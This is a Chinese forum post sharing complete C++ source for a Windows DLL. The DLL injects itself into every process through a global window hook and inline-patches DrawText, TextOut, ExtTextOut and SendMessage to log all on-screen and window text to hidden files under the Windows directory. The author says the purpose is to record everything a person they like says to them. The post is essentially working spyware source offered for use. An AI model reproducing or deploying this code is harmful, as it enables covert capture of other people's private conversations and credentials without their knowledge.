说起这份代码的由来,其实是因为我说过要记住某人对我说的一切(我喜欢 ta),然而我怎么可能记着 ta 对我说的所有话呢,于是就傻傻的写下这代码.......
代码很简单,使用 hook 技术 hook 了 ExtTextOut、TextOut、DrawText 等函数,然后把记录下来的文字写在 %windir%\realxin\xinA.txt、xinW.txt 中,xinA.txt 是保存 Ansi 字符串的,W 就是 unicode
编译成 dll 后可以插入到某个进程、或者调用 inhook 函数即可
写的很烂,不要扔鸡蛋呀...
// realxindz .cpp : 定义 DLL 应用程序的入口点。
//
#include "stdafx.h"
#include "Windows.h"
#ifdef _MANAGED
#pragma managed(push, off)
#endif
int _stdcall HookCall(int iCode,WPARAM wParam,LPARAM lParam);
extern "C" _declspec(dllexport) void inhook();
extern "C" _declspec(dllexport) void unhook();
int __stdcall xin_DrawTextA(HDC hdc,char *lpctxt,int count,LPRECT lprect,UINT uFormat);
int __stdcall xin_DrawTextW(HDC hdc,wchar_t *lpctxt,int count,LPRECT lprect,UINT uFormat);
int __stdcall xin_TextOutA(HDC hdc,int x,int y ,char *lpctxt,int ilen);
int __stdcall xin_TextOutW(HDC hdc,int x,int y ,wchar_t *lpctxt,int ilen);
int __stdcall xin_ExtTextOutA(HDC hdc,int x,int y,UINT fuOptions,RECT* lprc,char *lpctxt,UINT uc,int *lpdx);
int __stdcall xin_ExtTextOutW(HDC hdc,int x,int y,UINT fuOptions,RECT* lprc,wchar_t *lpctxt,UINT uc,int *lpdx);
int __stdcall xin_SendMessageA(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam);
int __stdcall xin_SendMessageW(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam);
void Write_xinA(char *FileName,char *xiny);
void Write_xinW(char *FileName,wchar_t *xiny);
void *hookapi(char *lpLibName,char *lpFunName,DWORD dwNewFunAddr,BYTE oldCode[5]);
void unhookapi(void *oldFunAddr,BYTE oldCode[5]);
char chPathFileNameA[255];
char chPathFileNameW[255];
HHOOK hookj;
HINSTANCE hins;
int i = 0;
void *hProc=(void*)-1;
void *lpDrawTextA;
void *lpDrawTextW;
void *lpTextOutA;
void *lpTextOutW;
void *lpExtTextOutA;
void *lpExtTextOutW;
void *lpSendMessageA;
void *lpSendMessageW;
BYTE bDrawTextA[5];
BYTE bDrawTextW[5];
BYTE bTextOutA[5];
BYTE bTextOutW[5];
BYTE bExtTextOutA[5];
BYTE bExtTextOutW[5];
BYTE bSendMessageA[5];
BYTE bSendMessageW[5];
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
hins = hModule;
//hProc = -1;
char chPath[255];
char chDir[255];
memset(chPath,0,255);
memset(chDir,0,255);
GetWindowsDirectory(chPath,255);
wsprintf(chDir,"%s%s",chPath,"\\realxin");
CreateDirectory(chDir,0);
wsprintf(chPathFileNameA,"%s%s",chDir,"\\xinA.txt");
wsprintf(chPathFileNameW,"%s%s",chDir,"\\xinW.txt");
lpDrawTextA = hookapi("user32.dll","DrawTextA",(DWORD)xin_DrawTextA,bDrawTextA);
lpDrawTextW = hookapi("user32.dll","DrawTextW",(DWORD)xin_DrawTextW,bDrawTextW);
lpTextOutA = hookapi("gdi32.dll","TextOutA",(DWORD)xin_TextOutA,bTextOutA);
lpTextOutW = hookapi("gdi32.dll","TextOutW",(DWORD)xin_TextOutW,bTextOutW);
lpExtTextOutA = hookapi("gdi32.dll","ExtTextOutA",(DWORD)xin_ExtTextOutA,bExtTextOutA);
lpExtTextOutW = hookapi("gdi32.dll","ExtTextOutW",(DWORD)xin_ExtTextOutW,bExtTextOutW);
lpSendMessageA = hookapi("user32.dll","SendMessageA",(DWORD)xin_SendMessageA,bSendMessageA);
lpSendMessageW = hookapi("user32.dll","SendMessageW",(DWORD)xin_SendMessageW,bSendMessageW);
}
if(ul_reason_for_call == DLL_PROCESS_DETACH) {
unhookapi(lpDrawTextA,bDrawTextA);
unhookapi(lpDrawTextW,bDrawTextW);
unhookapi(lpTextOutA,bTextOutA);
unhookapi(lpTextOutW,bTextOutW);
unhookapi(lpExtTextOutA,bExtTextOutA);
unhookapi(lpExtTextOutW,bExtTextOutW);
unhookapi(lpSendMessageA,bSendMessageA);
unhookapi(lpSendMessageW,bSendMessageW);
}
return TRUE;
}
extern "C" _declspec(dllexport) void inhook()
{
hookj = SetWindowsHookEx(WH_CALLWNDPROC,(HOOKPROC)HookCall,hins,0);
}
extern "C" _declspec(dllexport) void unhook()
{
UnhookWindowsHookEx(hookj);
}
int _stdcall HookCall(int iCode,WPARAM wParam,LPARAM lParam)
{
return CallNextHookEx(hookj,iCode,wParam,lParam);
}
void Write_xinA(char *FileName,char *xiny)
{
try{
char chPath[] = "c:\\chixinA.txt";
//MessageBoxW(0,(wchar_t*)xiny,0,0);
long loFileSize;
DWORD dwtone = 0x0a0d;
void *hFile;
DWORD dwlng;
hFile = CreateFile(FileName,GENERIC_ALL,FILE_SHARE_WRITE|FILE_SHARE_READ,0,CREATE_NEW,0,0);
CloseHandle(hFile);
hFile = CreateFile(FileName,GENERIC_ALL,FILE_SHARE_WRITE|FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
loFileSize = GetFileSize(hFile,0);
SetFilePointer(hFile,loFileSize,0,0);
WriteFile(hFile,&dwtone,2,&dwlng,0);
WriteFile(hFile,xiny,(DWORD)lstrlen(xiny),&dwlng,0);
CloseHandle(hFile);
}catch(...){}
}
void Write_xinW(char *FileName,wchar_t *xiny)
{
try{
char chPath[] = "c:\\chixinW.txt";
//MessageBoxW(0,(wchar_t*)xiny,0,0);
long loFileSize;
DWORD dwtone = 0x000a000d;
DWORD dwuniheader = 0xFEFF;
void *hFile;
DWORD dwlng;
hFile = CreateFile(FileName,GENERIC_ALL,FILE_SHARE_WRITE|FILE_SHARE_READ,0,CREATE_NEW,0,0);
WriteFile(hFile,&dwuniheader,2,&dwlng,0);
CloseHandle(hFile);
hFile = CreateFile(FileName,GENERIC_ALL,FILE_SHARE_WRITE|FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
loFileSize = GetFileSize(hFile,0);
SetFilePointer(hFile,loFileSize,0,0);
WriteFile(hFile,&dwtone,4,&dwlng,0);
WriteFile(hFile,xiny,(DWORD)lstrlenW(xiny)*2,&dwlng,0);
CloseHandle(hFile);
}catch(...){}
}
void *hookapi(char *lpLibName,char *lpFunName,DWORD dwNewFunAddr,BYTE oldCode[5])
{
DWORD jmpaddr = 0;
BYTE jmptonewfun[5] = {0xe9};
DWORD oldfun;
HMODULE hmod = LoadLibrary(lpLibName);
oldfun = (DWORD)GetProcAddress(hmod,lpFunName);
jmpaddr = dwNewFunAddr - oldfun - 5;
memcpy(jmptonewfun+1,&jmpaddr,4);
ReadProcessMemory(GetCurrentProcess(),(LPVOID)oldfun,oldCode,5,0);
WriteProcessMemory(GetCurrentProcess(),(LPVOID)oldfun,jmptonewfun,5,0);
return (void*)oldfun;
}
void unhookapi(void *oldFunAddr,BYTE oldCode[5])
{
WriteProcessMemory(GetCurrentProcess(),(LPVOID)oldFunAddr,oldCode,5,0);
}
int __stdcall xin_DrawTextA(HDC hdc,char *lpctxt,int count,LPRECT lprect,UINT uFormat)
{
try{
unhookapi(lpDrawTextA,bDrawTextA);
int iret = DrawTextA(hdc,lpctxt,count,lprect,uFormat);
lpDrawTextA = hookapi("user32.dll","DrawTextA",(DWORD)xin_DrawTextA,bDrawTextA);
char chtype[] = "DrawTextA";
char *chtxt = (char*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintf(chtxt,"%s-----%s",chtype,lpctxt);
Write_xinA(chPathFileNameA,chtxt);
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_DrawTextW(HDC hdc,wchar_t *lpctxt,int count,LPRECT lprect,UINT uFormat)
{
try{
unhookapi(lpDrawTextW,bDrawTextW);
int iret = DrawTextW(hdc,lpctxt,count,lprect,uFormat);
lpDrawTextW = hookapi("user32.dll","DrawTextW",(DWORD)xin_DrawTextW,bDrawTextW);
wchar_t chtype[] = L"DrawTextW";
//int iVirtualSize = (lstrlenW(lpctxt)*2)+(lstrlenW(chtype)*2)+1;
wchar_t *chtxt = (wchar_t*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintfW(chtxt,L"%s-----%s",chtype,lpctxt);
Write_xinW(chPathFileNameW,chtxt);
//MessageBoxW(0,lpctxt,0,0);
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_TextOutA(HDC hdc,int x,int y ,char *lpctxt,int ilen)
{
try{
int iret;
unhookapi(lpTextOutA,bTextOutA);
iret = TextOutA(hdc,x,y,lpctxt,ilen);
lpTextOutA = hookapi("gdi32.dll","TextOutA",(DWORD)xin_TextOutA,bTextOutA);
char chtype[] = "TextOutA";
char *chtxt = (char*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintf(chtxt,"%s-----%s",chtype,lpctxt);
Write_xinA(chPathFileNameA,chtxt);
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_TextOutW(HDC hdc,int x,int y ,wchar_t *lpctxt,int ilen)
{
try{
int iret;
unhookapi(lpTextOutW,bTextOutW);
iret = TextOutW(hdc,x,y,lpctxt,ilen);
lpTextOutW = hookapi("gdi32.dll","TextOutW",(DWORD)xin_TextOutW,bTextOutW);
wchar_t chtype[] = L"TextOutW";
//int iVirtualSize = (lstrlenW(lpctxt)*2)+(lstrlenW(chtype)*2)+1;
wchar_t *chtxt = (wchar_t*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintfW(chtxt,L"%s-----%s",chtype,lpctxt);
Write_xinW(chPathFileNameW,chtxt);
//VirtualFreeEx(hProc,chtxt,iVirtualSize,MEM_DECOMMIT);
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_ExtTextOutA(HDC hdc,int x,int y,UINT fuOptions,RECT* lprc,char *lpctxt,UINT uc,int *lpdx)
{
try{
int iret;
unhookapi(lpExtTextOutA,bExtTextOutA);
iret = ExtTextOutA(hdc,x,y,fuOptions,lprc,lpctxt,uc,lpdx);
lpExtTextOutA = hookapi("gdi32.dll","ExtTextOutA",(DWORD)xin_ExtTextOutA,bExtTextOutA);
char chtype[] = "ExtTextOutA";
char *chtxt = (char*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintf(chtxt,"%s-----%s",chtype,lpctxt);
Write_xinA(chPathFileNameA,chtxt);
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_ExtTextOutW(HDC hdc,int x,int y,UINT fuOptions,RECT* lprc,wchar_t *lpctxt,UINT uc,int *lpdx)
{
try{
int iret;
unhookapi(lpExtTextOutW,bExtTextOutW);
iret = ExtTextOutW(hdc,x,y,fuOptions,lprc,lpctxt,uc,lpdx);
lpExtTextOutW = hookapi("gdi32.dll","ExtTextOutW",(DWORD)xin_ExtTextOutW,bExtTextOutW);
wchar_t chtype[] = L"ExtTextOutW";
//int iVirtualSize = (lstrlenW(lpctxt)*2)+(lstrlenW(chtype)*2)+1;
wchar_t *chtxt = (wchar_t*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintfW(chtxt,L"%s-----%s",chtype,lpctxt);
Write_xinW(chPathFileNameW,chtxt);
//if(!VirtualFreeEx(hProc,chtxt,4096,MEM_DECOMMIT)) {Beep(1000,100);}
GlobalFree((HGLOBAL)chtxt);
return iret;
}catch(...){}
}
int __stdcall xin_SendMessageA(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam)
{
try{
int iret;
unhookapi(lpSendMessageA,bSendMessageA);
iret = SendMessageA(hwnd,msg,wParam,lParam);
lpSendMessageA = hookapi("user32.dll","SendMessageA",(DWORD)xin_SendMessageA,bSendMessageA);
if(msg == WM_SETTEXT || msg == LB_ADDSTRING || msg == WM_GETTEXT) {
char chtype[] = "SendMesageA";
char *chtxt = (char*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintf(chtxt,"%s-----%s",chtype,lParam);
Write_xinA(chPathFileNameA,chtxt);
GlobalFree((HGLOBAL)chtxt);
}
return iret;
}catch(...){}
}
int __stdcall xin_SendMessageW(HWND hwnd,UINT msg,WPARAM wParam,LPARAM lParam)
{
try{
int iret;
unhookapi(lpSendMessageW,bSendMessageW);
iret = SendMessageW(hwnd,msg,wParam,lParam);
lpSendMessageW = hookapi("user32.dll","SendMessageW",(DWORD)xin_SendMessageW,bSendMessageW);
if(msg == WM_SETTEXT || msg == LB_ADDSTRING || msg == WM_GETTEXT) {
wchar_t chtype[] = L"SendMessageW";
//int iVirtualSize = (lstrlenW(lpctxt)*2)+(lstrlenW(chtype)*2)+1;
wchar_t *chtxt = (wchar_t*)GlobalAlloc(GMEM_FIXED,4096);
if(chtxt == 0) {
return iret;
}
wsprintfW(chtxt,L"%s-----%s",chtype,lParam);
Write_xinW(chPathFileNameW,chtxt);
GlobalFree((HGLOBAL)chtxt);
}
return iret;
}catch(...){}
}
#ifdef _MANAGED
#pragma managed(pop)
#endif
[课程]Linux pwn 探索篇!
